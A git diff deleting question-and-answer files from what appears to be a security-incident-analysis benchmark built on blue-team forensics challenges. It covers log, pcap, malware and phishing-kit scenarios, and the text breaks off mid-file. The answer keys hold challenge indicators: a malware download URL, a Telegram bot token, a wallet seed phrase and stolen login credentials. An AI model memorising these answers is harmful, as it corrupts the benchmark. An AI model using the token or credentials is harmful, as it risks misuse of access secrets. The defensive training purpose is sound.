a/SIABench-main/SIA_Dataset/btlo_wordpress.json +++ /dev/null @@ -1,77 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://blueteamlabs.online/home/challenge/log-analysis-compromised-wordpress-ce000f5b59", - "scenario_name": "Compromised_Wordpress", - "last_accessed": "June 04, 2025", - "writeup": "https://medium.com/@azriq/btlo-log-analysis-compromised-wordpress-challenge-85b4bf7b14e2" - } - }, - { - "sia_components": { - "scenario": "A compromise has been detected on one of our WordPress websites. It is currently suspected that a vulnerable plugin enabled remote code execution, granting the attacker access to the server’s operating system. As an analyst, your responsibility is to review the logs and uncover indicators confirming this breach.", - "task_category": "Miscellaneous", - "complexity": "Easy", - "files_available": [ - "capture.log" - ], - "tools_available": [ - "tshark", - "python", - "md5sum", - "curl", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "tr", - "base64", - "cd", - "whois" - ], - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify any suspicious login activity to the WordPress admin panel? If so, provide the URI of the login attempt", - "answer": "/wp-login.php?itsec-hb-token=adminlogin", - "adversarial_tactic": "Credential Access: Identifying suspicious login attempts helps understand how attackers may have gained the credentials to access the system." - }, - { - "question": "2. Can you identify any external tools or software that the attacker may have used on the server? If so, list any tool names found in the log data.", - "answer": "wpscan sqlmap", - "adversarial_tactic": "Reconnaisance: Identifying tools used by the attacker helps understand how they gathered information about the target and potential vulnerabilities." - }, - { - "question": "3. Can you identify any plugins that were used to gain access to the server? If so, provide the plugin name and version.", - "answer": "simple file list 4.2.2", - "adversarial_tactic": "Initial Access: Identifying the plugin that led to the compromise helps understand the initial attack vector and potential vulnerabilities." - }, - { - "question": "4. Can you identify any files uploaded by the attacker? If so, provide the filename.", - "answer": "fr34k.php", - "adversarial_tactic": "Execution: Identifying uploaded scripts helps understand the attackers actions and potential goals." - }, - { - "question": "5. Can you identify the access attempts to the uploaded script file? If so, provide the final HTTP response code returned when the file was accessed last in the log.", - "answer": "404", - "adversarial_tactic": "Execution: Understanding the response code helps determine if the attackers actions were successful or if the file was detected and blocked." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/classical_injection.json b/SIABench-main/SIA_Dataset/classical_injection.json deleted file mode 100644 index 2e845b28f99492a38920251fc0fba8b5b6a281e4..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/classical_injection.json +++ /dev/null @@ -1,75 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://blueteamlabs.online/home/challenge/reverse-engineering-a-classic-injection-9791a9b784", - "scenario_name": "Btlo_Classical_Injection", - "last_accessed": "June 04, 2025", - "writeup": "https://medium.com/@ERBATMAN/blue-teams-labs-online-reverse-engineering-a-classic-injection-f77b8101fa4b" - } - }, - { - "sia_components": { - "scenario": "This task aims to place you in the role of a blue team security analyst, where you'll analyze a de-compiled code of malicious exe file and answer the following questions.", - "task_category": "Malware Analysis", - "complexity": "Easy", - "tools_available": [ - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois", - "curl", - "xxd" - ], - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "files_available": "code.c", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Upon execution, can you identify if the malware delays its behavior by putting itself to sleep? If so, can you analyze the code to identify any sleep time of the malware?", - "answer": "3 minutes.", - "adversarial_tactic": "Defense Evasion: Delaying execution can help malware avoid detection by security tools or analysts." - }, - { - "question": "2. Can you identify if the malware prompts the user for a password before continuing its execution? If so, can you analyze the code to identify the password?", - "answer": "'btlo'.", - "adversarial_tactic": "Execution: The malware is executing code on the system and requires a password to progress or perform malicious actions" - }, - { - "question": "3. Can you identify if there is any shellcode section present in the malware? If so, what is the size of the shellcode?", - "answer": "473 bytes.", - "adversarial_tactic": "Execution: Shellcode is a primary executable payload, and analyzing its size relates to understanding its operational payload." - }, - { - "question": "4. Can you identify if the malware injects shellcode into another process? If so, can you analyze the code to identify the API call used for this process injection?", - "answer": "'CreateRemoteThread'.", - "adversarial_tactic": "Defense Evasion: Process injection can help malware avoid detection by running malicious code within legitimate processes." - }, - { - "question": "5. Can you identify if the malware interact with any specific process during its execution? If so, what is the name of the victim process?", - "answer": "'nslookup.exe'.", - "adversarial_tactic": "Privilege Escalation: Interacting with specific processes can indicate attempts to elevate privileges or perform malicious actions within a targeted process." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/get_pdf.json b/SIABench-main/SIA_Dataset/get_pdf.json deleted file mode 100644 index 2ca1fc4cab345ca8de673b74d6e587f475953a89..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/get_pdf.json +++ /dev/null @@ -1,93 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/getpdf/", - "scenario_name": "Get_PDF", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/GetPDF" - } - }, - { - "sia_components": { - "scenario": "An unsuspecting user browses the web and clicks on a seemingly harmless link, leading them to a compromised web page. Without warning, the page redirects the browser to a malicious PDF file. As the PDF opens in the browsers Adobe Acrobat Reader plug-in, an unpatched vulnerability in the software is silently exploited. The attackers malware is then downloaded and installed onto the users machine, all without their knowledge. The cyber defense team has captured the network traffic during this incident. Your task is to analyze the provided pcap file and extract relevant information to understand the attack.", - "task_category": "Network Forensics", - "complexity": "Medium", - "tools_available": [ - "tshark", - "pdf-parser", - "pdfid", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois", - "curl" - ], - "files_available": "capture.pcap", - "directory": "(directory_of_the_files)", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "questions": [ - { - "question": "1. How many unique URL paths are involved in the network traffic of the captured pcap file?", - "answer": "6 URL paths", - "adversarial_tactic": "" - }, - { - "question": "2. Is there any JavaScript code found in the captured network traffic? If so, what is the URL where this JavaScript is found?", - "answer": "'http://blog.honeynet.org.my/forensic_challenge/'.", - "adversarial_tactic": "Execution: JavaScript code in network traffic may execute code upon loading in the browser, aligning with Execution via web-based scripts that execute malicious functions." - }, - { - "question": "3. Does the JavaScript code found in the pcap file contain any hidden entities like URL? If so, what is the URL? ", - "answer": "'http://blog.honeynet.org.my/forensic_challenge/getpdf.php'.", - "adversarial_tactic": "Execution: Hidden URLs in JavaScript can be used to download additional payloads or redirect users to malicious sites" - }, - { - "question": "4. Is there a PDF file present in the network traffic? If so, what is the MD5 hash of the PDF file?", - "answer": "'659cf4c6baa87b082227540047538c2a'.", - "adversarial_tactic": "Initial Access: Malicious PDFs are often used to deliver malware to get an initial foothold on a system." - }, - { - "question": "5. Can you analyze the PDF file and determine the number of objects present within the file?", - "answer": "19", - "adversarial_tactic": "" - }, - { - "question": "6. Are there any filtering schemes used for the object streams in the PDF file? If so, how many filtering schemes are present?", - "answer": "4", - "adversarial_tactic": "Defense Evasion: Attackers often use filtered streams to obfuscate content, hence inspecting filtering schemes supports Defense Evasion by detecting potential obfuscation techniques." - }, - { - "question": "7. Does the PDF file contain any object streams with any code snippets that seem to be suspicious? If so, what is the number of the object stream containing the code?", - "answer": "'5'", - "adversarial_tactic": "Execution: Locating JavaScript in PDFs ties to Execution as embedded scripts in PDF objects can be used to deliver payloads when the file is opened in a PDF reader." - }, - { - "question": "8. Analyze the content of the PDF file and determine if it contains any exploit. If so, what is the URL of the malicious executable that the shellcode associated with the exploit drop?", - "answer": "'http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe'.", - "adversarial_tactic": "Execution: The shellcode could be dropping and executing a malicious executable." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/grab_the_fisher.json b/SIABench-main/SIA_Dataset/grab_the_fisher.json deleted file mode 100644 index cf1fd508a60876ebb88ba66d07ad700fc0e02d0b..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/grab_the_fisher.json +++ /dev/null @@ -1,110 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/", - "scenario_name": "Grab_the_Fisher", - "last_accessed": "June 04, 2025", - "writeup": "https://forensicskween.com/ctf/cyberdefenders/grabthephisher/" - } - }, - { - "sia_components": { - "scenario": "Multiple users of a decentralized finance (DeFi) platform have reported suspicious fund withdrawals without their consent. An in-depth forensic analysis traced the issue to a phishing website that closely resembled the legitimate PancakeSwap exchange and deceived victims into revealing their wallet seed phrases. The phishing infrastructure was hosted on a hijacked server, with stolen credentials being transmitted through a Telegram bot. Your mission is to carry out threat intelligence analysis of the phishing infrastructure, uncover indicators of compromise (IoCs), and investigate the attacker’s digital activity, including Telegram IDs and online aliases, to better understand their tactics, techniques, and procedures (TTPs).", - "task_category": "Miscellaneous", - "complexity": "Easy", - "directory": "(directory_of_the_files)", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.(Add instructions related to usage of python scripts if needed). ", - "files_available": "scenario", - "tools_available": [ - "html2text", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois", - "curl" - ], - "questions": [ - { - "question": "1. Is there a specific wallet used for asking the seed phrase? If so, which wallet is it?", - "answer": "MetaMask", - "adversarial_tactic": "Initial Access: Recognizing the wallet service helps understand the phishing kit s target and potential victims, aligning with Initial Access tactics." - }, - { - "question": "2. Is there a file that contains the code for phishing kit? If so, name the file.", - "answer": "scenario/metamask/metamask.php or metamask.php", - "adversarial_tactic": "Initial access: Identifying the main operational file helps understand the phishing kits functionality and potential entry points for victims, aligning with Initial Access tactics." - }, - { - "question": "3. Can you determine the primary programming language used in writing the phishing kit? If so, what is the language?", - "answer": "PHP", - "adversarial_tactic": "" - }, - { - "question": "4. Does the phishing kit use any external services to gather information about the victims machine? If so, what is the name of the service?", - "answer": "Spyex Geo", - "adversarial_tactic": "Exfiltration: External services like Spyex Geo are used to gather additional information about the victim, aligning with Exfiltration tactics." - }, - { - "question": "5. Can you determine if the phishing kit has a specific number of seed phrases it collected already? If so, what is the number?", - "answer": "3", - "adversarial_tactic": "" - }, - { - "question": "6. If you can collect the seed phrases, what is the most recent wallet seed phrase collected? ", - "answer": "father also recycle embody balance concert mechanic believe owner pair muffin hockey", - "adversarial_tactic": "Credential Access: Retrieving specific seed phrases links to Credential Access since these credentials are necessary for wallet control and exploitation by the attacker." - }, - { - "question": "7. Does the phishing kit include any functionality for credential dumping? If so, what communication medium is used for this purpose?", - "answer": "Telegram", - "adversarial_tactic": "Exfiltration: Determining if Telegram or similar channels are used for data exfiltration aligns with Exfiltration, as the phishing kit sends stolen information to remote channels." - }, - { - "question": "8. Can you identify the token used for communication medium in the phishing kit? if so, what is the token?", - "answer": "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10", - "adversarial_tactic": "Exfiltration: Identifying the Telegram token shows how data is exfiltrated, providing insight into the attackers chosen medium for moving stolen information externally." - }, - { - "question": "9. Can you identify any chat ID associated with the phishers channel in the phishing kit? If so, what is the chat ID?", - "answer": "5442785564", - "adversarial_tactic": "Exfiltration: Finding the chat ID aligns with Exfiltration tactics, as it allows tracing where data is sent and understanding exfiltration routes." - }, - { - "question": "10. Are there any references to other individuals or entities who may be involved in developing or distributing this phishing kit? If so, identify them.", - "answer": "j1j1b1s@m3r0", - "adversarial_tactic": "" - }, - { - "question": "11. Based on the available information from the phishing kits communication medium (e.g., tokens, chat IDs), identify the full name of the individual managing the communication channel?", - "answer": "Marcus Aurelius", - "adversarial_tactic": "Command and Control: Associating a name with the communication channel helps identify the individual behind the phishing kit and their potential role in the operation." - }, - { - "question": "12. Based on the available information from the phishing kits Telegram communication (e.g., tokens, chat IDs), determine the username of the individual managing the phishing kits Telegram channel?", - "answer": "pumpkinboii", - "adversarial_tactic": "Command and Control (C2): Establishing the username of the Telegram channel manager ties into Command and Control, helping link attacker infrastructure to a specific operator." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/hammered.json b/SIABench-main/SIA_Dataset/hammered.json deleted file mode 100644 index f0f896883125f91e6a5798c8957b456422344b09..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/hammered.json +++ /dev/null @@ -1,104 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/hammered/", - "scenario_name": "Hammered", - "last_accessed": "June 04, 2025", - "writeup": "https://forensicskween.com/ctf/cyberdefenders/hammered/" - } - }, - { - "sia_components": { - "scenario": "This challenge immerses you in virtual environments and puzzling log files. As a SOC Analyst, your task is to investigate the logs from a potentially compromised server to determine what occurred with the webserver honeypot.", - "task_category": "Memory Forensics", - "complexity": "Medium", - "tools_available": [ - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois", - "curl" - ], - "files_available": "scenario", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.(Add instructions related to usage of python scripts if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify if the attacker gain access to the system? if so, what service was used to gain access to the system? ", - "answer": "ssh", - "adversarial_tactic": "Initial Access: Identifying the service used for initial compromise is crucial for understanding the attack vector and improving defenses against similar entry points." - }, - { - "question": "2. Can you identify the operating system version of the targeted system? If so, what is the name of the operating system?", - "answer": "4.2.4-1ubuntu3", - "adversarial_tactic": "" - }, - { - "question": "3. If the attacker gained access to the system, can you identify the name of the account that was compromised? If so, what is the name?", - "answer": "root", - "adversarial_tactic": "Credential Access: Identifying compromised accounts is essential for understanding the scope of access obtained by attackers and the potential impact on system security." - }, - { - "question": "4. Can you identify the number of attacker got access to the system? If so, what is the number?", - "answer": "6", - "adversarial_tactic": "" - }, - { - "question": "5. Can you identify if any requests were sent to the apache server? if so, how many requests were sent?", - "answer": "365", - "adversarial_tactic": "Command and Control: Monitoring web request volume can indicate the presence of Command and Control (C2) activity, where attackers use web servers to communicate with compromised systems or exfiltrate data." - }, - { - "question": "6. Can you identify if any rules were added to the firewall? If so, how many rules were added?", - "answer": "6", - "adversarial_tactic": "Defense Evasion: Adding firewall rules can be a tactic to evade detection by blocking security monitoring tools or preventing alerts from being triggered, allowing attackers to maintain access without raising suspicion." - }, - { - "question": "7. Can you identify if there is a scanning tool downloaded in the target system? if so, what is the tool?", - "answer": "nmap", - "adversarial_tactic": "Discovery: Scanning tools like nmap are often used by attackers to gather information about the target system, including open ports, services running, and potential vulnerabilities that can be exploited for further access or lateral movement." - }, - { - "question": "8. Can you identify if there was any login from IP with 219.150.161.20? If so, what was the timestamp of the login?", - "answer": "04/19/2010 05:56:05 AM ", - "adversarial_tactic": "" - }, - { - "question": "9. Can you identify any warning messages related to database security? If so, what is the most critical warning message?", - "answer": "mysql.user contains 2 root accounts without password!", - "adversarial_tactic": "" - }, - { - "question": "10. Can you identify if any new accounts have been created on the system? If so, can you provide the name or names of the new accounts?", - "answer": "wind3str0y", - "adversarial_tactic": "Persistence: Creating new user accounts is a common technique used by attackers to establish persistent access to compromised systems, especially if the initial access vector is detected and blocked." - }, - { - "question": "11. Can you identify if there was any proxy used in the system to run the scans? If so, what is the name of the proxy?", - "answer": "pxyscand/2.1", - "adversarial_tactic": "Discovery: Using a proxy for scans can help attackers gather information about the target system while obfuscating their true source, making it harder for defenders to trace the origin of the attack." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/hawkeye.json b/SIABench-main/SIA_Dataset/hawkeye.json deleted file mode 100644 index fd42a6ab544ebd015fe6d50b2634bdf42d5c1eac..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/hawkeye.json +++ /dev/null @@ -1,156 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/hawkeye/", - "scenario_name": "Hawkeye", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/HawkEye" - } - }, - { - "sia_components": { - "scenario": "An employee in the accounting department of your organization received an email containing an invoice with an embedded download link. Following the email’s opening, unusual network activity was detected. As a SOC analyst, your task is to examine the network logs and investigate any potential data exfiltration attempts.", - "task_category": "Network Forensics", - "complexity": "Medium", - "tools_available": [ - "tshark", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois", - "curl" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts if needed).\n", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Analyze the network traffic capture file to determine how many packets are present in the entire capture.", - "answer": "4003", - "adversarial_tactic": "" - }, - { - "question": "2. What is the timestamp of the first packet captured in the pcap file?", - "answer": "April 10, 2019 at 16:37:07 EDT or 2019-04-10 20:37:07 UTC.", - "adversarial_tactic": "" - }, - { - "question": "3. Based on the pcap file, determine the total duration of the network capture.", - "answer": "The duration of the capture is 01:03:41.", - "adversarial_tactic": "" - }, - { - "question": "4. Investigate the pcap file and identify the most active computer at the link level.", - "answer": "00:08:02:1c:47:ae.", - "adversarial_tactic": "" - }, - { - "question": "5. The organization works with private addressing and netmask /24. How many computers in the organization are involved in the capture? ", - "answer": "3", - "adversarial_tactic": "" - }, - { - "question": "6. Determine the the name of the most active computer at the network level.", - "answer": "Beijing-5cd1-PC.", - "adversarial_tactic": "" - }, - { - "question": "7. What is the IP of the organization's DNS server based on the network traffic?", - "answer": "10.4.10.4.", - "adversarial_tactic": "" - }, - { - "question": "8. Can you determine if there is any domain queried in packet 204 by one of the computers in the network, if so, what is the domain?", - "answer": "proforma-invoices.com.", - "adversarial_tactic": "" - }, - { - "question": "9. Resolve the found domain queried to its corresponding IP address using data from the pcap file.", - "answer": "217.182.138.150.", - "adversarial_tactic": "" - }, - { - "question": "10. Based on network traffic, identify the operating system of the victim's machine.", - "answer": "Windows NT 6.1.", - "adversarial_tactic": "" - }, - { - "question": "11. Is there any suspicious file downloaded by the victim's computer during the network capture? If so, determine the name of the file.", - "answer": "tkraw_Protected99.exe.", - "adversarial_tactic": "" - }, - { - "question": "12. If any suspicious file is found, determine the MD5 hash of the file.", - "answer": "71826ba081e303866ce2a2534491a2f7.", - "adversarial_tactic": "Execution: Identifying files such as executables and their hashes can help in understanding the executed potential malware involved in the attack." - }, - { - "question": "13. Can you identify if there is any software that runs the web server hosting the suspicious file downloaded by the victim's computer? If so, can you provide the name of the software?", - "answer": "LiteSpeed.", - "adversarial_tactic": "Initial Access: Understanding the server software can help from where the malicious file was downloaded and how the attacker gained initial access to the victim's machine." - }, - { - "question": "14. What is the public IP address of the victim's computer observed in the network capture?", - "answer": "173.66.146.112.", - "adversarial_tactic": "" - }, - { - "question": "15. Is there any evidence that data is stolen from the victim's computer?", - "answer": "Yes, data is exfiltrated from the victim's computer.", - "adversarial_tactic": "Exfiltration: This question directly seeks to verify data theft, which is central to the Exfiltration tactic. Evidence of data leaving the network is a primary indicator of an adversary achieving their objective." - }, - { - "question": "16. If there is any evidence of stolen data, identify the country from which the stolen data is sent.", - "answer": "United States", - "adversarial_tactic": "Command and Control: Identifying the location of the email server can determine the adversary's location or the location of the compromised server used for exfiltration.", - "Task Cateogory": "OSINT" - }, - { - "question": "17. If there is any evidence of stolen data, can you find any software that runs the email server to which the stolen data is sent? If so, what is the name of the software?", - "answer": "Exim 4.91.", - "adversarial_tactic": "Exfiltration: Understanding the email server software can help in identifying the exfiltration method used by the attacker and the potential vulnerabilities exploited." - }, - { - "question": "18. If there is any evidence of stolen data, can you identify the destination email address to which the stolen data is sent from the victim's computer. ", - "answer": "sales.del@macwinlogistics.in.", - "adversarial_tactic": "Exfiltration: Identifying the destination address is crucial to understand where the stolen data is sent, aligning with the Exfiltration tactic where the attacker moves data out of the network." - }, - { - "question": "19. Can you identify if there is any password used by the suspicious file to send the stolen data. If there is, what is the password?", - "answer": "Sales@23.", - "adversarial_tactic": "Exfiltration: Identifying the password used for exfiltration is crucial for understanding the adversary's techniques and the exfiltration process." - }, - { - "question": "20. Based on your analysis, can you determine which malware variant was responsible for exfiltrating the stolen data?", - "answer": "Reborn v9.", - "adversarial_tactic": "Exfiltration: Identifying the malware variant is crucial for understanding the adversary's techniques and the exfiltration process." - }, - { - "question": "21. Analyze the network traffic to extract if you can find any Bank of America login credentials (username and password) involved in the data exfiltration attempt. If you can find, provide the credentials.", - "answer": "Troman.mcguire:P@ssw0rd$.", - "adversarial_tactic": "Credential Access: Finding login credentials exfiltrated during the attack highlights credential-harvesting goals, directly aligning with the Credential Access tactic where the attacker seeks to steal sensitive information." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/insider.json b/SIABench-main/SIA_Dataset/insider.json deleted file mode 100644 index 5906477447adbb92feddc5015e184d541416164b..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/insider.json +++ /dev/null @@ -1,105 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/insider/", - "scenario_name": "Insider", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/Insider" - } - }, - { - "sia_components": { - "scenario": "After an employee started working at the organization, they began engaging in illegal activities internally. You have been hired as a Security Operations Center (SOC) analyst to initiate an investigation into the incident.A disk image of the employee's computer, which runs a Linux operating system, has been obtained. Your task is to analyze the disk image and answer the associated questions.", - "task_category": "Memory Forensics", - "complexity": "Easy", - "tools_available": [ - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python" - ], - "files_available": [ - "sample.ad1", - "sample.ad1.txt" - ], - "instructions": "\nYou are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install the tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts and volatility if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify the Linux distribution used on employee's machine? If so, what is the name of the Linux distribution?", - "answer": "kali", - "adversarial_tactic": "" - }, - { - "question": "2. Can you find any file named 'access.log' in the disk image? If so, what is the MD5 hash of this file?", - "answer": "d41d8cd98f00b204e9800998ecf8427e", - "adversarial_tactic": "" - }, - { - "question": "3. Can you identify if any credential dumping tools were used on employee's machine? If so, what is the name of the tool?", - "answer": "mimikatz_trunk.zip", - "adversarial_tactic": "Credential Access: Identifying credential dumping tools is crucial for understanding how attackers may have obtained sensitive information such as passwords or authentication tokens." - }, - { - "question": "4. Can you identify if any super-secret files were created on employee's machine? If so, what is the path of the file?", - "answer": "/root/Desktop/SuperSecretFile.txt", - "adversarial_tactic": "Collection: Creating or Storing super-secret files can indicate an attempt to collect sensitive information or data exfiltration." - }, - { - "question": "5. Can you identify if there was any program used by didyouthinkwedmakeiteasy.jpg during execution? If so, what is the name of the program?", - "answer": "binwalk", - "adversarial_tactic": "Defense Evasion: Using tools like binwalk can help attackers analyze and manipulate files to evade detection by security systems." - }, - { - "question": "6. Can you identify if there was any checklist created on employee's machine? If so, what is the third goal from the checklist the employee created?", - "answer": "Profit", - "adversarial_tactic": "" - }, - { - "question": "7. Can you identify if apache was running on employee's machine? If so, how many times was it running?", - "answer": "0", - "adversarial_tactic": "" - }, - { - "question": "8. Can you identify if the employees machine was used to attack other machines? If so, what is the name of the file that provides evidence of this?", - "answer": "irZLAohL.jpeg", - "adversarial_tactic": "Lateral Movement: Identifying files related to attacks on other machines can indicate lateral movement within a network, where an attacker attempts to compromise additional systems after gaining access to one." - }, - { - "question": "9. Can you identify if the employee was taunting a fellow computer expert? If so, can you identify the name of the person she was taunting?", - "answer": "Young", - "adversarial_tactic": "" - }, - { - "question": "10. Can you identify if any user tried to access the root account? If so, what is the name of the user?", - "answer": "postgres", - "adversarial_tactic": "Credential Access: Attempting to access the root account is a common tactic used by attackers to gain elevated privileges and control over the system." - }, - { - "question": "11. Can you identify the last active directory in the filesystem before the disk image was created? If so, what is the absolute path of the directory?", - "answer": "/root/Documents/myfirsthack/", - "adversarial_tactic": "" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/maldoc.json b/SIABench-main/SIA_Dataset/maldoc.json deleted file mode 100644 index 86fe377ddd8f4e22b114c14c95e29c056d3793ae..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/maldoc.json +++ /dev/null @@ -1,73 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/maldoc101/", - "scenario_name": "Maldoc_101", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/MalDoc101" - } - }, - { - "sia_components": { - "scenario": "This task aims to demonstrate how critical indicators of compromise (IOCs) can be quickly uncovered by examining artifacts. As a blue team analyst, your responsibility is to conduct static analysis on the provided files and answer the related questions.", - "task_category": "Malware Analysis", - "complexity": "Medium", - "files_available": "sample.bin", - "tools_available": [ - "oledump", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python" - ], - "instructions": "\nYou are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install the tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts or oledump if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify if there are macros present in the document, identify the highest-numbered stream that contains a macro.", - "answer": "16.", - "adversarial_tactic": "Execution: Understanding the presence of macros helps identify potential malicious code execution within the document." - }, - { - "question": "2. Can you find any event that is used to begin the execution of the macros? If so, what is the event?", - "answer": "Document_Open.", - "adversarial_tactic": "Execution: Recognizing 'Document_Open' as the trigger event indicates the method of Execution in this case, using macros to initiate further actions." - }, - { - "question": "3. Among the streams in the document, can you identify if there is any stream that contains any obfuscated base64 encoded string. If so, can you provide the stream number?", - "answer": "stream 34.", - "adversarial_tactic": "Defense Evasion: Finding encoded strings within streams often points to Defense Evasion, as attackers frequently use encoding to conceal malicious payloads or instructions." - }, - { - "question": "4. Do you find any padded string used for the obfuscated base64 string? If so, what value is used for padding or obfuscating?", - "answer": "'2342772g3&*gs7712ffvs626fq'.", - "adversarial_tactic": "Defense Evasion: Examining obfuscation techniques (such as padding in encoded strings) fits Defense Evasion since attackers obfuscate content to avoid detection." - }, - { - "question": "5. Do you think if there is any program executed by the obfuscated base64 encoded string? If so, what is the program executed?", - "answer": "'powershell'.", - "adversarial_tactic": "Defense Evasion: Recognizing PowerShell execution from obfuscated strings indicates an attempt to evade detection by using legitimate tools for malicious purposes." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/nuke_the_browser.json b/SIABench-main/SIA_Dataset/nuke_the_browser.json deleted file mode 100644 index 2577ccabaa732c91cbbe3431e9dedc5d6c70634b..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/nuke_the_browser.json +++ /dev/null @@ -1,100 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/nukethebrowser/", - "scenario_name": "Nuke_The_Browser", - "last_accessed": "June 04, 2025", - "writeup": "https://forensicskween.com/ctf/cyberdefenders/nukethebrowser/" - } - }, - { - "sia_components": { - "scenario": "A PCAP file has been captured containing network trace data, which includes evidence of an attack. The IP address of the victim has been anonymized to conceal the true location. As a SOC analyst, analyze the artifacts provided and answer the associated questions.", - "task_category": "Network Forensics", - "complexity": "Hard", - "tools_available": [ - "tshark", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "uniq", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois", - "curl" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Multiple systems were targeted. Provide the IP address of the highest one.", - "answer": "10.0.5.15", - "adversarial_tactic": "" - }, - { - "question": "2. Analyze the traffic protocols in the pcap file. What protocol seems to be the attack was carried out over?", - "answer": "HTTP", - 